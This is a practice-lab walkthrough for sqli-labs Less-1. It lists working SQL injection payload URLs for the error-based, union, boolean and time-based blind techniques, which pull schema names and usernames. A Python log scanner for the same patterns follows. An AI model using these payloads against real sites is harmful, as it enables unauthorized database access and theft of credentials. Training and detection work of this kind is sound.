Method 1: error-based injection with extractvalue()
Identify the injection point: enter a single quote and the page returns an error
http://172.16.173.131/sqli-labs/Less-1/?id=1'
Close the preceding single quote, comment out the trailing one, and add a condition as the payload:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
Because the error message is displayed on the page, extractvalue() error-based injection can be used.
First check whether the function can be executed:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,md5(123));--+
Retrieve version(), database(), user() and similar information:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,database()));--+
Retrieve table names:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)));--+
Retrieve the column names of users:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)));--+
Retrieve the contents of each column (id, username, password):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1)));--+
Method 2: union-based injection
Identify the injection point: enter a single quote and the page returns an error
http://172.16.173.131/sqli-labs/Less-1/?id=1'
Use order by to determine the number of columns:
http://172.16.173.131/sqli-labs/Less-1/?id=1' order by 3--+
union select injection:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,22,33--+
Determine the database name:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,database(),33--+
Retrieve the table names of security:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),33--+
Retrieve column names:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),33--+
Retrieve the contents of each column (id, username, password):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select username from security.users limit 1,1)),33--+
Method 3: boolean-based injection with page echo (character-by-character ASCII comparison)
Identify the injection point: enter a single quote and the page returns an error
http://172.16.173.131/sqli-labs/Less-1/?id=1'
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
Retrieve the database name:
Compare ASCII values one character at a time, changing the second argument of substr() from 1 to n:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr(database(),1,1))=115--+
Retrieve table names (emails, referers, uagents, users):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
Retrieve the column names of users:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105--+
Retrieve the contents of each column (id, username, password):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))>65--+
Method 4: time-based blind injection (sleep(), if())
if((condition),m,n): returns m if the condition is true and n if it is false;
Retrieve the database name:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and sleep(if((ascii(substr(database(),1,1))=115),5,0))--+
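The same four payload shapes, seen from the defender's side: this added example (not part of the walkthrough or of sqli-labs) scans constructed Apache-style access log lines for the extractvalue(), union select, ascii(substr()) and sleep(if()) patterns used above and labels each hit by technique. The log lines, the rule labels and the helper names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One rule per technique used in the walkthrough; matched against the
# URL-decoded value of every query parameter (decoding handles %27 and '+').
SQLI_RULES = [
    ("error-based (extractvalue)", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("boolean-based (ascii/substr)", re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I)),
    ("time-based (sleep/if)", re.compile(r"\bsleep\s*\(", re.I)),
    ("column probing (order by)", re.compile(r"\border\s+by\s+\d+", re.I)),
]

# Combined log format: only the request target between the quotes is needed.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed sample lines (not from a real server); line 1 is a benign request.
SAMPLE_LOG = [
    '172.16.173.1 - - [01/Jan/2024:10:00:00 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 712',
    '172.16.173.1 - - [01/Jan/2024:10:00:05 +0800] "GET /sqli-labs/Less-1/?id=1%27%20and%20extractvalue(1,concat(0x7e,database()))--+ HTTP/1.1" 200 734',
    '172.16.173.1 - - [01/Jan/2024:10:00:09 +0800] "GET /sqli-labs/Less-1/?id=1%27%20and%201=2%20union%20select%2011,database(),33--+ HTTP/1.1" 200 720',
    '172.16.173.1 - - [01/Jan/2024:10:00:14 +0800] "GET /sqli-labs/Less-1/?id=1%27%20and%20sleep(if((ascii(substr(database(),1,1))=115),5,0))--+ HTTP/1.1" 200 712',
]

def classify_request(target: str):
    """Return the sorted technique labels whose pattern matches any decoded query value."""
    hits = set()
    # parse_qs percent-decodes values and turns '+' into a space, so the
    # trailing '--+' comment from the payloads arrives as '-- '.
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            for label, pattern in SQLI_RULES:
                if pattern.search(value):
                    hits.add(label)
    return sorted(hits)

def scan_log(lines):
    """Yield (line_no, request_target, labels) for every line that matches a rule."""
    for line_no, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue  # not a request line we can parse
        labels = classify_request(match.group(1))
        if labels:
            yield line_no, match.group(1), labels

if __name__ == "__main__":
    for line_no, target, labels in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(labels)}  <- {target}")
```

A request can match more than one rule; the last sample line reports both the boolean and the time-based technique because the sleep(if()) payload wraps an ascii(substr()) comparison.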